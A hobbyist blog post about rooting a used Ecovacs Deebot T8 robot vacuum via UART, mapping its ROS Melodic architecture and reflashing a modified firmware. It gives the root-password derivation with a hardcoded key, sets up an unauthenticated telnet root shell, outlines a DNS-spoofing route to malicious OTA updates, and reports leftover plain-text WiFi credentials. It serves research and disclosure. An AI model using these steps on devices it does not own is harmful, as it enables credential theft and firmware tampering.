I came across a DEFCON video by Dennis Giese talking about how they got shell access to Ecovacs robots and found serious vulnerabilities in how ECOVACS was handling sensitive information. This intrigued me to learn more about the it and from a detailed collection of information on the robots that Dennis and his team put together in robotinfo.dev, I was excited to learn that Ecovacs robot use ROS.

Given these robots have got cheaper on the second hand market, I found a used one with broken motor for dirt cheap. Below is the documented journey into the internals of an Ecovacs Deebot T8 running ROS Melodic on a Rockchip PX30 SoC.


Getting Shell Access

Going through the slides that Dennis had put on the website, I was quickly able to figure out and connect the UART port. The port pins are defined at the end of his slide deck and is straight forward. 1 GND 1 RX 1 TX. Hooking it up to a serial to USB, I was able to see the boot sequence.

The password for the user root is calculated using a script Dennis figured out. It calculates the root password at boot by combining three pieces of information:

  • the machine codename (px30-sl for the T8) (Thanks to Dennis for providing me this)
  • a hardcoded key string (d4:3d:7e:fa:12:5d:C8:02:8F:0A:E2:F5)
  • the last 8 characters of the device serial number

These are concatenated in that order with a newline appended, then run through SHA256 to produce a hex digest. That hex string is then suffixed with -\n and the whole thing is Base64 encoded to produce the final password. The result is deterministic — the same serial number always produces the same password — which is why Dennis was able to reverse engineer it and build the web calculator.


The Setup

Once I had shell access, I started with a raw squashfs dump (rootfs.squashfs, 36MB) extracted from the robot's NAND flash. The goal: understand how the robot works, modify it, and find if we can reflash custom firmware.

Platform details uncovered during the process:

  • SoC: Rockchip PX30 (aarch64)
  • OS: Custom embedded Linux, BusyBox userspace
  • ROS: Melodic (ROS 1)
  • Flash: NAND via Rockchip rkflash driver
  • IoT: Ecovacs cloud (XMPP/MQTT via medusa daemon)

Part 1: Boot Sequence

The entry point is /etc/inittab:

::sysinit:/etc/rc.sysinit
::respawn:/sbin/getty 115200 ttyFIQ0

Two things stand out immediately:

  1. The system init runs /etc/rc.sysinit
  2. A login shell is running on ttyFIQ0 at 115200 baud — the Rockchip FIQ debug UART, accessible via UART, the shell that was being used.

rc.conf — The Daemon List

/etc/rc.conf defines which daemons start at boot using a space-separated DAEMONS list. Prefixes control behaviour:

  • No prefix → start synchronously
  • @ → start in background
  • !skip entirely
DAEMONS="pre_boot.sh mount_data.sh post_boot.sh time_sync.sh audio_service.sh
         wifi.sh ros.sh wpa_supplicant.sh medusa.sh deebot.sh wifi_service.sh
         wifi_daemon.sh key_service.sh crond.sh !vsftpd.sh goahead.sh
         start_ap.sh autostart.sh play_boot_music.sh !adbd.sh ota_status.sh dog.sh"

Notable disabled services: vsftpd (FTP), adbd (ADB).

Boot Order Summary

Stage Script What it does
1 pre_boot.sh GPIO setup, WiFi power-on, zram swap
2 mount_data.sh Mounts /data (writable partition)
3 post_boot.sh Reads sysinfo from NAND, sets up IoT config
4 ros.sh Starts roscore (ROS master)
5 wpa_supplicant.sh WiFi association
6 medusa.sh Ecovacs IoT/cloud daemon
7 deebot.sh Main robot process
8 autostart.sh Runs *.sh scripts from /data/autostart/
9 dog.sh Watchdog (monitors medusa, WiFi health)

Part 2: The ROS Architecture

roscore

ros.sh starts roscore with:

export ROS_HOSTNAME=deebot
export ROS_MASTER_URI=http://deebot:11311
roscore --master-logger-level=fatal &

The deebot Binary — A Custom Node Loader

Rather than using rosrun or roslaunch, the robot uses a single binary deebot that dynamically loads ROS nodes as shared libraries from /usr/lib/node/:

deebot /etc/conf/dxai_node.json

The config dxai_node.json lists all nodes:

{
  "path": "/usr/lib/node",
  "nodes": [
    { "lib": "eros_node_hardware_platform", "node": "hardware_platform" },
    { "lib": "eros_node_task_manager",       "node": "task_manager" },
    { "lib": "eros_node_slam",               "node": "slam" },
    { "lib": "eros_node_setting",            "node": "setting" },
    { "lib": "eros_node_return",             "node": "return" },
    { "lib": "eros_node_map",                "node": "map" },
    { "lib": "eros_node_clean",              "node": "clean" },
    { "lib": "eros_node_alert",              "node": "alert" },
    { "lib": "eros_node_lifespan",           "node": "lifespan" },
    { "lib": "eros_node_inspect_charger",    "node": "chargeinspect" },
    { "lib": "eros_node_bigdata",            "node": "bigdata" },
    { "lib": "eros_node_rock",               "node": "rock" }
  ]
}

Each library exports create_instance_<name>() and delete_instance_<name>() as entry points.

Node Breakdown

Node Library Purpose
hardware_platform liberos_node_hardware_platform.so (1.2MB) HAL — owns /dev/ttyS1,3,4 (lidar, motors, laser)
task_manager liberos_node_task_manager.so (2.2MB) Orchestrates all cleaning task lifecycle
slam liberos_node_slam.so (344KB) SLAM wrapper around external libslam.so
setting liberos_node_setting.so (401KB) Fan speed, water level, mop mode, schedules
return liberos_node_return.so (435KB) Return-to-dock navigation
map liberos_node_map.so (923KB) Map storage, zones, virtual walls
clean liberos_node_clean.so (690KB) Path planning, cleaning execution, carpet detection
alert liberos_node_alert.so (213KB) Fault detection, alert publishing
lifespan liberos_node_lifespan.so (184KB) Component wear tracking
chargeinspect liberos_node_inspect_charger.so (160KB) Charger dock signal validation
bigdata liberos_node_bigdata.so (1.1MB) Telemetry aggregator, uploads to Ecovacs cloud
rock liberos_node_rock.so (70KB) Oscillation motion for stuck recovery

The medusa Daemon

medusa is the IoT bridge — it connects to Ecovacs servers and bridges cloud commands to ROS via mdsctl:

medusa -f /etc/conf/medusa/deebot_px30_sl.conf

If medusa exits, it kills deebot. If deebot exits, medusa gets killed. They are tightly coupled — one without the other is not a valid state.


OTA Mechanism

The OTA update flow uses wget --no-check-certificate, meaning SSL validation is disabled. The robot queries:

https://portal-ww.ecouser.net/api/ota/products/wukong/class/<model>/firmware/latest.json

The metadata JSON contains: version, url, checkSum (MD5). Since SSL isn't validated, a DNS MITM attack could serve a crafted firmware update — you'd control both the JSON and the image, so the MD5 check is no obstacle.


Part 3: Flash Layout

The NAND flash is exposed via Rockchip's rkflash block device driver. Partition layout:

/proc/partitions:
  rkflash0      — full device (487424 blocks = 476MB)
  rkflash0p1    — uboot    (4MB)
  rkflash0p2    — trust    (4MB)
  rkflash0p3    — mx       (4MB)
  rkflash0p4    — my       (4MB)
  rkflash0p5    — sys      (2MB)   ← boot slot selector + sysinfo
  rkflash0p6    — boot1    (6MB)   ← Android boot image, slot A
  rkflash0p7    — rootfs1  (70MB)  ← squashfs, slot A
  rkflash0p8    — boot2    (6MB)   ← Android boot image, slot B
  rkflash0p9    — rootfs2  (70MB)  ← squashfs, slot B (default)
  rkflash0p10   — data     (298MB) ← writable /data partition

Named partition symlinks live at /dev/block/bootdevice/by-name/.

A/B Slot System

The device uses a dual-rootfs redundancy scheme. The active slot is selected by U-Boot reading the first sector of the sys partition (rkflash0p5):

boot_mode1\n  →  loads boot1 (p6) + rootfs1 (p7)
boot_mode2\n  →  loads boot2 (p8) + rootfs2 (p9)  [factory default]

Confirmed by: kernel cmdline has empty androidboot.slot_suffix= and both boot images have empty embedded cmdlines — U-Boot generates the cmdline dynamically based on boot_mode.

Switching slots:

printf 'boot_mode1\n' | dd of=/dev/rkflash0p5 bs=1 count=11 conv=notrunc && sync

Recovering to factory slot:

printf 'boot_mode2\n' | dd of=/dev/rkflash0p5 bs=1 count=11 conv=notrunc && sync

Part 4: Modifying and Reflashing

Understanding the Read-Only Root Filesystem

The Deebot's root filesystem is a SquashFS image — a read-only compressed filesystem mounted directly from NAND flash. This means any changes made to files under / (including /etc, /opt/ros, /usr/lib) are lost on reboot, as there is no persistent writable overlay.

To make permanent modifications — such as patching libxmlrpcpp.so to fix the XML-RPC bind address, or updating the ROS environment variables in rc.sysinit — the only option is to:

  1. Extract the squashfs image
  2. Modify files on a host machine
  3. Repack it with mksquashfs
  4. Transfer the new image to the robot's writable /data partition
  5. Flash it directly to the rootfs NAND partition (/dev/rkflash0p7) with dd

The /data partition is the only truly persistent writable storage on the device, which is why WiFi credentials, maps, logs, and user configuration all live there — it survives reflashes entirely. This architecture is common in embedded systems: immutable system partition + mutable data partition.

Changes Made

File Change
etc/rc.conf Removed ! from autostart.sh to enable /data/autostart/ scripts
etc/rc.sysinit Enabled telnetd -l /bin/sh -p 23 &
etc/rc.sysinit Fixed hostname: debootdeebot
etc/rc.sysinit ROS_HOSTNAME=deebot, ROS_MASTER_URI=http://deebot:11311
etc/rc.d/ros.sh Same ROS env changes
etc/rc.d/deebot.sh Same ROS env changes
etc/rc.d/medusa.sh Same ROS env changes
etc/hosts Created: 127.0.0.1 localhost + 127.0.0.1 deebot
/data/autostart/dropbear.sh Added dropbear SSH server script to remove dependency on UART cable

Why /etc/hosts Was Needed

ROS requires ROS_HOSTNAME to be resolvable — roscore contacts itself via that name. Without /etc/hosts mapping deebot to 127.0.0.1, roscore fails with:

RLException: Unable to contact my own server at [http://deebot:44629/]

The original firmware had no /etc/hosts because it used localhost (always resolves). After switching to a named hostname, this file became necessary.

SSH Access via Dropbear

To eliminate the need for a physical UART connection, I added a dropbear SSH server that starts automatically in directory '/data/autostart/dropbear.sh'.

This script runs on boot (since we enabled autostart.sh in rc.conf), allowing wireless SSH access over WiFi. Once this was in place, the UART cable could be disconnected — all debugging and ROS exploration can now be done remotely over SSH.

Build Command

sudo mksquashfs squashfs-root/ new_rootfs.squashfs \
    -comp gzip -b 131072 -noappend \
    -force-uid 0 -force-gid 0

Key flags:

  • -comp gzip -b 131072 — must match original filesystem parameters
  • -force-uid 0 -force-gid 0 — all files must be owned by root, not the build user
  • -noappend — create fresh, don't append to existing file

Flash Procedure

# Transfer new_rootfs.squashfs to robot /data/ via netcat:
# Robot:  nc -l -p 1234 > /data/new_rootfs.squashfs
# Host:   pv new_rootfs.squashfs | nc -q 1 <robot_ip> 1234

# Verify squashfs magic (68 73 71 73 = "hsqs")
dd if=/data/new_rootfs.squashfs bs=4 count=1 2>/dev/null | od -A x -t x1

# Write to inactive slot (safe — doesn't affect running system)
dd if=/data/new_rootfs.squashfs of=/dev/rkflash0p7 bs=4096 && sync

# Switch boot slot
printf 'boot_mode1\n' | dd of=/dev/rkflash0p5 bs=1 count=11 conv=notrunc && sync

reboot

Lessons Learned

  1. ! prefix in DAEMONS disables services!autostart.sh and !vsftpd.sh were silently skipped. Easy to miss when reading individual rc.d scripts in isolation.

  2. squashfs ownership requires -force-uid 0 -force-gid 0 — running mksquashfs as root isn't enough if the source files are owned by a regular user on the host.

  3. The A/B slot system is a great safety net — writing to the inactive slot and switching boot_mode means the original firmware is always one dd command away from recovery.


Security Concerns

While exploring the robot's internals, I was able to independently confirm the serious privacy and security issues that Dennis Giese and his team originally discovered and reported:

Data Persistence After Factory Reset

I bought this Ecovacs Deebot T8 from Facebook Marketplace. The previous owner had performed a factory reset before selling it. However, when I got it home and connected it to the app:

  • The previous owner's map data was still present - including custom room names and defined cleaning zones
  • This persisted despite creating a new account and adding the robot as a "new" device
  • The factory reset clearly doesn't wipe /data partition properly

Plain Text WiFi Credentials

Once I gained shell access, I found an even worse issue:

WiFi passwords are stored in plain text in the /data/config/netmon/serv.conf file. The system:

  • Stores credentials as simple key-value pairs
  • Maintains historical data of all previous networks
  • Never purges old credentials

This means every WiFi network the robot has ever connected to (including all previous owners' SSIDs and passwords) remains on the device in plain text.

Security Impact:

  • A used robot is essentially a WiFi password database of everyone who's owned it
  • No encryption, no secure storage
  • "Factory reset" doesn't clear this data
  • Physical access to UART = full credential dump

This is a serious privacy vulnerability that affects anyone selling or buying used Ecovacs robots.


What's Next: Exploring the ROS Implementation

As a roboticist, what excites me most about this platform isn't just the security research — it's seeing ROS deployed in a production consumer device. While this post focused on gaining access and understanding the system architecture, there's a whole other layer to explore: how Ecovacs actually uses ROS in practice.

Future Deep Dives

I'm planning follow-up posts that dive into:

ROS Topics & Services:

  • What topics are published by each node?
  • How does the task_manager orchestrate cleaning operations?
  • What's the message flow between SLAM, navigation, and motor control?
  • How does the cloud bridge (medusa) interact with ROS topics?

SLAM Implementation:

  • How does the libslam.so library work?
  • What SLAM algorithm is being used? (Is it a custom implementation or based on known techniques?)
  • How is map data structured and stored?
  • Can we visualize the SLAM output in RViz?

Navigation & Path Planning:

  • How does return-to-dock navigation work?
  • What's the path planning algorithm in the clean node?
  • How does carpet detection integrate with the cleaning logic?
  • Can we modify cleaning patterns or behaviors?

Production ROS Lessons:

  • What can we learn from seeing ROS in a mass-market product?
  • How did they handle the single-binary node loader vs. traditional roslaunch?
  • What are the performance characteristics on embedded hardware (PX30)?
  • How is error handling and fault tolerance implemented?

Why This Matters

Most roboticists work with ROS in labs, research environments, or prototypes. Seeing it deployed in millions of consumer devices is rare. Understanding how Ecovacs optimized ROS for production — the good, the bad, and the ugly — offers valuable insights for anyone building commercial robots.

Plus, having full root access to a ROS robot with LIDAR, navigation, and SLAM running on real hardware is an incredible learning platform.

Stay tuned for Part 2, where we'll dive deep into the ROS architecture and start poking at those topics and services.